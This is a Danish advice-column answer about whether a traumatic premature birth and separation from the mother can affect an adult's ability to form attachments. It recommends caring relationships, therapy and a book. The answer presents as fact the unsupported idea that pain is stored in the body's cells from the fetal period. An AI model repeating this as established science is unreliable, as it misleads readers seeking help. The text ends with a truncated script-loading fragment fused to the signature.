Tidlige oplevelser kan præge os hele livet
Kære Suh.
Jeg har fået fortalt, at min mor havde en meget traumatisk fødsel, da hun skulle føde mig. Jeg var for tidligt født og tæt på at dø. Jeg blev fjernet fra hende, og hun havde vist nok også en fødselsdepression bagefter. Jeg har som voksen haft svært ved at knytte mig til andre og også at tro på andres kærlighed til mig. Kan det have noget at gøre med min start på livet? Selvom det ligger så langt tilbage?
Mvh Mig
Kære Dig
Ja, selv meget tidlige traumer kan påvirke vores følelsesliv som voksne – selv inde i vores mors mave påvirkes vi og begynder at danne os forestillinger om, hvad der venter os udenfor. Er de signaler vi bliver påvirkede af som fostre/spæde overvejende negative med fx trusler og afvisning, vil de være med til at grundlægge en negativ forventning til resten af verden. Omvendt vil overvejende positive signaler med omsorg og anerkendelse være med til, at vi møder verden med en grundlæggende positiv forventning. Hvor meget vi er prægede af de indtryk, vi får i foster-tilstanden og i den spæde periode, afhænger naturligvis af, hvordan resten af vores udvikling foregår. Et tidligt traume kan altså opvejes af store mængder af kærlighed og tryghed senere hen.
I din situation kan den barske adskillelse fra din mor, da du var nyfødt, eventuelt have plantet en utryghed i dig, og måske endda en fremadrettet forventning om, at dine følelsesmæssige basale behov ikke ville blive mødt. Hvis din mor på grund af en fødselsdepression efterfølgende har haft svært ved helt at imødekomme netop dine følelsesmæssige behov, er du blevet bekræftet i dette. Du har måske derfor trukket dig ind i dig selv som en instinktiv beskyttelse af dig, hvorved din mor måske er blevet bekræftet i sin angst for ikke at slå til som mor. Således kan en virkelig uheldig og negativ måde at være i verden på etableres, uden at nogen nogensinde har villet dig det ondt. Hvis dette mønster fortsætter i forhold til veninder, venner, kærester osv., så bliver det psykiske sår desværre aktiveret igen og igen og får ikke mulighed for at hele ordentligt op.
Kan man arbejde med så tidlige traumer? Ja, det kan man. Man kan bl.a. vælge helt bevidst at søge de relationer, som netop tilbyder den omsorg og tryghed, som man er i underskud af. En kærlig relation til fx en ægtefælle kan have en fantastisk helende effekt. Nogle har også brug for at få bearbejdet den smerte og sorg, der ligger lagret i cellerne helt tilbage fra fostertilstanden/spædbarnsperioden, hvilket man som regel har brug for professionel hjælp til. Her er det hovedsageligt kropslige udtryk, der er brug for – at gråd kan fx forløse vældig meget, også selvom man nogle gange ikke helt ved, hvorfor man græder (det er vist mest kendt blandt kvinder).
Læs evt. bogen ”8 skridt tilbage til fremtiden” af Frank og Catherine Fabiano, som tidligere har været anmeldt her i Udfordringen.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);
